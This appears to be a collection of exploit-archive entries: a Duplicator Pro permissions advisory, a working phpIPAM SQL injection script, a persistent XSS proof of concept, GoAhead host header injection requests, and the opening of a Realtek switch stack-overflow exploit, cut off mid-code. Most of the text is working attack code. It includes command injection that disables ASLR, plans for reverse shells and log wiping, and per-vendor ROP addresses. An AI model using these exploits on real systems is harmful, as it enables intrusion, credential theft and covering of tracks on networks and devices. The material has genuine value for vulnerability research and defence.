Product: Duplicator Pro
Vendor:  SnapCreek
Website: https://snapcreek.com/
Discovered by: Evolution Hosting
Version vulnerable: <= 1.3.14
Fixed in: 1.3.15+

Vulnerability Type:  Information Disclosure, local exposure of entire
webinstallation content

remotely triggerable: not for itself. Needs wp admin interaction.

O== Advise

Update to 1.3.15+ version

We did not test for a possible CSRF combination (i.e. with other plugins
) to lever it to a remote executable attack. Updating your Wordpress
Plugins regularly is a smart idea in general.

O== Timeline:

25.06.2019 - problem detected
26.06.2019 - vendor contacted
27.06.2019 - first vendor reaction
05.07.2019 - silent patched version made public by vendor
05.07.2019 - working fix confirmed
26.09.2019 - 90day timer run out

O== Description:

Duplicator( Pro ) can import/export/backup Wordpress installations.
While restoring the path after an import/restore, the directory mode of
the apphome is made public, if they were private before.

O== Tested Scenario:

OS:         Linux
Apache PHP: CGI with user privilege seperation
Docroot:    "/home/username/public_html/"

# ls -la /home/ | grep username
drwxr-x---    5 username webservices 4096 25. Jun 14:13 username

After Duplicator has done its import/restore:

drwxr-xr-x    5 username webservices 4096 25. Jun 14:17 username

which opens the home directory of this webapp for any other systemuser.
As fileaccessrules usually are relaxed inside a "home" directory, the
entire content along the installation path could be exposed, if the
pathpart was app owned.

This may include database credentials for wp and other apps for the same
user.

O== Temp Fix:

If you have a similar setup as our example above, execute after a restore:

chmod o-rx /home/username

O== Impact on none Linux systems

Unkown.

#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Exploit Author: Kevin Kirsche
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package
# CVE: CVE-2019-16692

# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738
# https://github.com/kkirsche/CVE-2019-16692

# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu


from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
"ipamusername": "Admin",
"ipampassword": "Password",
}

payload = {
"action": "add",
"table": "",
}


cmds = {
"unpriv": [
"select user()",
"select system_user()",
"select @@version",
"select @@datadir",
"select @@hostname",
    ]
}

if __name__ == "__main__":
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
            print(f"[*] Received: {info}")

# Exploit Title: thesystem Persistent XSS 
# Author: Anıl Baran Yelken 
# Discovery Date: 2019-09-28 
# Vendor Homepage: https://github.com/kostasmitroglou/thesystem 
# Software Link: https://github.com/kostasmitroglou/thesystem 
# Tested Version: 1.0 
# Tested on OS: Windows 10 
# CVE: N/A 
# Type: Webapps 
# Description: 
# Persistent XSS after login bypass(login_required didn't used) 

First of all, I send a request add_server 
POST /add_server/ HTTP/1.1 
Host: 127.0.0.1:8000 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; boundary=---------------------------3902153292 
Content-Length: 1205 
Connection: close 
Referer: http://127.0.0.1:8000/add_server/ 
Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977; _gid=GA1.1.882048829.1569577719 
Upgrade-Insecure-Requests: 1 
-----------------------------3902153292 
Content-Disposition: form-data; name="csrfmiddlewaretoken"
S5HLlkGrTnGH2FHIP4ry58Mw8Rw9KiPF3j6wIQ5tQvzMLmZTLAayAVs4Htg6OCRn 
-----------------------------3902153292 
Content-Disposition: form-data; name="operating_system"
<script>alert("kale1")</script> 
-----------------------------3902153292 
Content-Disposition: form-data; name="ip_address"
127.0.0.1 
-----------------------------3902153292 
Content-Disposition: form-data; name="system_port"
22 
-----------------------------3902153292 
Content-Disposition: form-data; name="system_owner"
<script>alert("kale2")</script> 
-----------------------------3902153292 
Content-Disposition: form-data; name="system_username"
<script>alert("kale3")</script> 
-----------------------------3902153292 
Content-Disposition: form-data; name="system_password"
<script>alert("kale4")</script> 
-----------------------------3902153292 
Content-Disposition: form-data; name="system_description"
<script>alert("kale5")</script> 
-----------------------------3902153292 
Content-Disposition: form-data; name="server_name"
<script>alert("kale6")</script> 
-----------------------------3902153292-- 

After I send a request show_server_data 
GET /show_server_data/ HTTP/1.1 
Host: 127.0.0.1:8000 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: close 
Referer: http://127.0.0.1:8000/data/ 
Cookie: csrftoken=Mss47G2ILybbQoFYXpVPlWNaUzGQ5yKoXGRPucrKIG4gz5X9TVEPQJtItbqN9SM6; _ga=GA1.1.567905900.1569231977 
Upgrade-Insecure-Requests: 1 

And I showed persistent XSS: 
HTTP/1.1 200 OK 
Date: Sat, 28 Sep 2019 09:51:04 GMT 
Server: WSGIServer/0.2 CPython/3.5.3 
Content-Length: 437 
Content-Type: text/html; charset=utf-8 
X-Frame-Options: SAMEORIGIN 
(23, 'test', '192.168.1.4', '22', 'test@test', 'root', '1234', 'test', 'test', '2019-09-26')(24, '<h1>Unix', '192.168.1.5', '22', 'test@test', 'root', '1234', 'test2', 'test2', '2019-09-26')(25, '<script>alert("kale1")</script>', '127.0.0.1', '22', '<script>alert("kale2")</script>', '<script>alert("kale3")</script>', '<script>alert("kale4")</script>', '<script>alert("kale5")</script>', '<script>alert("kale6")</script>', '2019-09-28')

# Exploit Title: GoAhead Web server HTTP Header Injection.
# Shodan Query: Server: Goahead
# Discovered Date: 05/07/2019
# Exploit Author: Ramikan
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5.0 may be others.
# Tested On Version: 2.5.0 in Cisco Switches and Net Gear routers.
# Vendor Fix: N/A
# CVE : N/A
# CVSS v3: N/A
# Category: Hardware, Web Apps
# Reference : www.fact-in-hack.blogspot.com

Vulnerability: Host Header Injection

A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.

An issue was discovered in GoAhead web server version 2.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack

PS: Affected on most of embedded webservers on hardware such as switches, routers, IOT and IP cameras. 


POC: 1

Request:

POST /goform/login HTTP/1.1
Host: myevilwebsite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close
Referer: https://46725846267.com/login.asp
Upgrade-Insecure-Requests: 1

username=admin&password=admin&language=english


Response:


HTTP/1.0 302 Redirect
Server: Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN
Date: Fri Jul 12 15:28:29 2019
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

<html><head></head><body>
This document has moved to a new <a href="https://myevilwebsite.com/login.asp">location</a>.
Please update your documents to reflect the new location.
</body></html>

POC: 2

Request:

POST /config/log_off_page.htm HTTP/1.1
Host: google.com:443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 12344
Content-Type: application/x-www-form-urlencoded
Content-Length: 774
Connection: close
Upgrade-Insecure-Requests: 1

restoreUrl=&errorCollector=&ModuleTable=OK&rlPhdModuleTable%24VT=OK&rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleNumberOfPorts%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&ModuleTable%24endVT=OK&rlPhdModuleStackUnit%24repeat%3F1=1&rlPhdModuleIndex%24repeat%3F1=1&rlPhdModuleType%24repeat%3F1=47&rlPhdModuleNumberOfPorts%24repeat%3F1=28&ModuleTable%24endRepeat%3F1=OK&userName%24query=%24enab15%24&password%24query=admin&x=0&y=0

Response:

HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Sat Oct 14 19:04:59 2006
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://google.com:443/config/accessnotallowedpage.htm

<html><head></head><body>
                        This document has moved to a new <a href="http://google.com:443/config/accessnotallowedpage.htm">location</a>.
                        Please update your documents to reflect the new location.
</body></html>

POC: 3 

curl -k --header "Host: attacker domain""victim's url"


Initial Investigation:

Potentially affected Part of the source code in GoAhead web server is in the ’http.c’ file, which contains 'host' parameter.
https://github.com/embedthis/goahead/blob/master/src/http.c

#!/usr/bin/python2.7
#
"""

[Subject]

Realtek Managed Switch Controller (RTL83xx) PoC (2019 bashis)
https://www.realtek.com/en/products/communications-network-ics/category/managed-switch-controller

[Brief description]

1.Boa/Hydra suffer of exploitable stack overflow with a 'one byte read-write loop' w/o boundary check. (all FW version and vendors affected)
Note: The vulnerability are _not_ from Boa nor Hydra, coming from Realtek additional coding
2.Reuse of code between vendors gives almost indentical exploitation of found vulnerabilities
3.Two strcpy() vulnerable fixed buffers next to each others in same function make it easy for jumping in Big Endian

[Goals for this PoC]

1.One Python PoC for all vendors
Using dictionaries to have one 'template' for each vendor and another dictionary with unique details for each target, to be merged on the fly.
The python code will read and use details from dictionary when verifying/exploiting

2.Uniquely identify remote target
ETag - Static and excellent tool for determine remote target, due to non-changing 'last modified' in same revision of Firmware

ETag: xxxxx-yyyyy
xxxxx = file size (up to 5 digits)
yyyyy = last modified (up to 5 digits)

3.Reverse shell
MIPS Big Endian shellcode is the only option, as there are no 'netcat/telnet/stunnel.. etc' availible

4.add/delete credentials for GUI/CLI
Quite many of the firmware's has the 'option' to add valid credentials by unauthorized updating of 'running-config'
For those who has added protection, we can add/delete credentials with an bit interesting jumping sequence

[Technical brief]
1.Stack       - Read/Write/Executable (Using CMD injection in the PoC to turn off ASLR)
2.Heap        - Read/Write/Executable (No need to turn off, ASLR not turned on for heap)
3.fork        - Boa/Hydra using forking shellcode, as I want try restart Boa/Hydra to avoid DoS after successful reverse shell

Two vulnerable buffers with fixed size in same call, we overwrite $RA with four bytes, and overwrite first byte in $RA with second buffers NULL termination,
this allows us to jump within the binary itself, and passing arguments for the function we jumping to by tailing these with the original request

[Basically]
First buffer:         [aaaaaaaa][0x58xxxxxx]('a' and 0x58 will be overwritten by second buffer)
Second buffer: [bbbbb][bbbbbbbb][0x00xxxxxx](NULL termination will overwrite 0x58)

[Known targets]

All below is fully exploitable, with following exception:
[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]

Not because they are not vulnerable, its because 1) their heap addresses lays at the '0x478000-0x47a000' range,
and 2) they using obfuscation 'encode' for the password (99 bytes max), we can never reach the 'two buffers' jump method.
[They are still fully exploitable with the Boa/Hydra vulnerability]

Note:
In this PoC I have only implemented few affected versions, in reality there is many more models and FW version affected.


$ ./Realtek-RTL83xx-PoC.py --etag help

[*] Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)
[*] RHOST: 192.168.57.20
[*] RPORT: 80
[*] LHOST: 192.168.57.1
[*] LPORT: 1337
[+] Target: List of known targets

[*] ETag: 225-51973   [Cisco Systems, Inc. Sx220 v1.1.3.1]
[*] ETag: 225-60080   [Cisco Systems, Inc. Sx220 v1.1.4.1]
[*] ETag: 752-76347   [ALLNET GmbH Computersysteme ALL-SG8208M v2.2.1]
[*] ETag: 225-21785   [Pakedgedevice & Software Inc SX-8P v1.04]
[*] ETag: 222-71560   [Zyxel Communications Corp. GS1900-24 v2.40_AAHL.1_20180705]
[*] ETag: 14044-509   [EnGenius Technologies, Inc. EGS2110P v1.05.20_150810-1754]
[*] ETag: 13984-12788 [Open Mesh, Inc. OMS24 v01.03.24_180823-1626]
[*] ETag: 218-22429   [PLANET Technology Corp. GS-4210-8P2S v1.0b171116]
[*] ETag: 218-7473    [PLANET Technology Corp. GS-4210-24T2S v2.0b160727]
[*] ETag: 752-95168   [DrayTek Corp. VigorSwitch P1100 v2.1.4]
[*] ETag: 225-96283   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.6]
[*] ETag: 225-63242   [EDIMAX Technology Co., Ltd. GS-5424PLC v1.1.1.5]
[*] ETag: 224-5061    [CERIO Corp. CS-2424G-24P v1.00.29]
[*] ETag: 222-50100   [ALLNET GmbH Computersysteme ALL-SG8310PM v3.1.1-R3-B1]
[*] ETag: 222-81176   [Shenzhen TG-NET Botone Technology Co,. Ltd. P3026M-24POE (V3) v3.1.1-R1]
[*] ETag: 8028-89928  [Araknis Networks AN-310-SW-16-POE v1.2.00_171225-1618]
[*] ETag: 222-64895   [Xhome DownLoop-G24M v3.0.0.43126]
[*] ETag: 222-40570   [Realtek RTL8380-24GE-4GEC v3.0.0.43126]
[*] ETag: 222-45866   [Abaniact AML2-PS16-17GP L2 v116B00033]
[*] ETag: 14044-44104 [EnGenius Technologies, Inc. EWS1200-28TFP v1.07.22_c1.9.21_181018-0228]
[*] ETag: 14044-32589 [EnGenius Technologies, Inc. EWS1200-28TFP v1.06.21_c1.8.77_180906-0716]
[*] ETag: 609-31457   [NETGEAR Inc. GS750E ProSAFE Plus Switch v1.0.0.22]
[*] ETag: 639-98866   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.45]
[*] ETag: 639-73124   [NETGEAR Inc. GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP v6.0.0.37]


[*] All done...

[Other vendors]
These names have been found within some Firmware images, but not implemented as I have not found any Firmware images.
(However, I suspect they use exact same Firmware due to the traces are 'logo[1-10].jpg/login[1-10].jpg')

[*] 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power

[Known bugs]
1.Non-JSON:
'/mntlog/flash.log' and '/var/log/flash.log' not always removed when using 'stack_cgi_log()'
(Must change value for 'flash.log' that needs to be 0x02, 'flash.log' has value 0x00)

[Responsible Disclosure]
Working with VDOO since early February 2019 to disclosure found vulnerabilities to vendors
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches


[Technical details]
Please read the code

"""
# Have a nice day
# /bashis
#

import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import hashlib
import re
import struct
import time
import thread
import json
import inspect
import copy

import hashlib
from Crypto.Cipher import AES
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto import Random
from random import randint

from pwn import * # pip install pwn

global debug
debug = False
global force
force = False

def DEBUG(direction, text):
if debug:
# Print send/recv data and current line number
print "[BEGIN {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
print "\n{}\n".format(text)
print "[ END  {}] <{:-^60}>".format(direction, inspect.currentframe().f_back.f_lineno)
return

class HTTPconnect:

def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw

def Send(self, uri, query_headers, query_data,ID,encode_query):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
self.encode_query = encode_query

# Connect-timeout in seconds
#timeout = 5
#socket.setdefaulttimeout(timeout)

url = '{}://{}{}'.format(self.proto, self.host, self.uri)

if self.verbose:
log.info("[Verbose] Sending: {}".format(url))

if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
#log.info("Creating SSL Unverified Context")
ssl._create_default_https_context = ssl._create_unverified_context

if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
log.info("[Verbose] User: {}, Password: {}".format(Basic_Auth[0],Basic_Auth[1]))
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
log.info("Basic Auth Error: {}".format(e))
sys.exit(1)

if self.query_data:
#request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
if self.query_data and self.encode_query:
request = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
else:
request = urllib2.Request(url, data=self.query_data, headers=self.query_headers)

if self.ID:
request.add_header('Cookie', self.ID)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
if self.ID:
request.add_header('Cookie', self.ID)
response = urllib2.urlopen(request)
#if response:
#print "[<] {} OK".format(response.code)

if self.Raw:
return response
else:
html = response.read()
return html

#
# Validate correctness of HOST, IP and PORT
#
class Validate:

def __init__(self,verbose):
self.verbose = verbose

# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP

ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True

# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT

if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True

# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST

try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid FQDN name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False

class Vendor:

def __init__(self, ETag):
self.ETag = ETag

def random_string(self,length):
self.length = length

return "a" * self.length
#return ''.join(random.choice(string.lowercase) for i in range(self.length))

#
# Source: https://gist.github.com/angstwad/bf22d1822c38a92ec0a9
#
def dict_merge(self, dct, merge_dct):
""" Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
updating only top-level keys, dict_merge recurses down into dicts nested
to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in merge_dct.iteritems():
if (k in dct and isinstance(dct[k], dict)
and isinstance(merge_dct[k], collections.Mapping)):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]


#
# Difference between vendors and Firmware versions.
# The update code will search below and update the template on the fly
# (you can tweak and add code in the template from here)
#
# ETag - excellent tool for determine the target
#
# ETag: xxxxx-yyyyy
# xxxxx = file size (up to 5 digits)
# yyyyy = last modified (up to 5 digits)
#
def dict(self):

Vendor_ETag = {
#
# PLANET Technology Corp.
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : No
# Del /mntlog/flash.log  : No
# Add credentials        : Yes
# Del credentials        : Yes
#
'218-22429': {
'template':'Planet',# Static for the vendor
'version':'1.0b171116',# Version / binary dependent stuff
'model':'GS-4210-8P2S',# Model
'uri':'https://www.planet.com.tw/en/product/GS-4210-8P2S',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484029c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'verify_uri':'/tmp/check',
'web_sys_ping_post':0x423B9C,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
# traceroute
#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/check',
#'web_sys_ping_post':0x4243FC,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x489368,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x48AB84,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x48C240,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x42DA80,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42DA80,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42C868,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'START':0x7ffeee04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 45,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},
'218-7473': {
'template':'Planet',# Static for the vendor
'version':'2.0b160727',# Version / binary dependent stuff
'model':'GS-4210-24T2S',# Model
'uri':'https://www.planet.com.tw/en/product/GS-4210-24T2S',
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40E04C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f99851c,# la $t9, system) # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484029c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# Ping IPv4
'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
'verify_uri':'/tmp/check',
'web_sys_ping_post':0x424594,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()

# traceroute
#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',
#'verify_uri':'/tmp/check',
#'web_sys_ping_post':0x424DF4,# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
'vulnerable': True,
},
'stack_cgi_log': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
'log_settings_set':0x48AA98,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_ramClear':0x48D9F4,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
'log_fileClear':0x48D9F4,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntp_set':0x42E474,# Jump one after 'sw $ra'# Set SNTP Server (Inject CMD)
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
'sys_timeSntpDel_set':0x42E474,# Jump one after 'sw $ra'# Delete (address, binary dependent) 
# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'# Enable/Disable (address, binary dependent)
'vulnerable': True,
}, 
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
'START':0x7ffeee04,# start: Stack overflow RA, used for searching NOP sled by blind jump
'STOP':0x7fc60000,# end: You may want to play with this if you dont get it working
'usr_nop': 64,# NOP sled (shellcode will be tailed)
'pwd_nop': 45,# filler/garbage (not used for something constructive)
'align': 3,# Align opcodes in memory
'stack':True,# NOP and shellcode lays on: True = stack, False = Heap
'vulnerable': True,
},
},
},

#
# Cisco Systems, Inc.
# Sx220 Series
#
# CGI Reverse Shell      : Yes
# Boa/Hydra reverse shell: Yes
# Del /var/log/ram.log   : Yes
# Del /var/log/flash.log : Yes
# Del /mntlog/flash.log  : Yes
# Add credentials        : Yes
# Del credentials        : Yes
#
'225-51973': {
'template':'Cisco',# Static for the vendor
'version':'1.1.3.1',# Version / binary dependent stuff
'exploit': {
'heack_hydra_shell': {
# /sqfs/bin/boa; embedparse() 
'gadget': 0x40F70C,# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
# /sqfs/bin/boa; read_body(); 
'system': 0x8f998524,# la $t9, system # opcode, binary dependent
# /sqfs/bin/boa; read_body(); 
'handler': 0x2484683c,# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
'v0': 7,# Should leave as-is (but you can play between 5 - 8)
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': { #
'vulnerable': False,
},
'stack_cgi_diag': {
# /sqfs/home/web/cgi/set.cgi;  cgi_sys_ping_set()
# Ping IPv4
'web_sys_ping_post':0x43535C,# Jump one after 'sw $ra'# (address, binary dependent)
'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
'sys_ping_post_check':'',

# /sqfs/home/web/cgi/set.cgi;  cgi_sys_tracert_set()
# traceroute
#'web_sys_ping_post':0x43567C,# Jump one after 'sw $ra'# (address, binary dependent)
#'sys_ping_post_cmd':'&srvHost=127.0.0.1 ";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;"&count=1',
#'sys_ping_post_check':'',

'verify_uri':'/tmp/check',
'vulnerable': True,# 
},
'stack_cgi_log': {
# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
'log_settings_set':0x436FDC,# Jump one after 'sw $ra'# Disable Logging (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
'log_ramClear':0x436F34,# Jump one after 'sw $ra'# Clean RAM log (address, binary dependent)
# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
'log_fileClear':0x436F88,# Jump one after 'sw $ra'# Clean FILE log (address, binary dependent)
'vulnerable': True,
},
'stack_cgi_sntp': {
# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()
'sys_timeSntp_set':0x434FB0,# Jump one after 'sw $ra'# Set SNTP Server (Inject RCE)
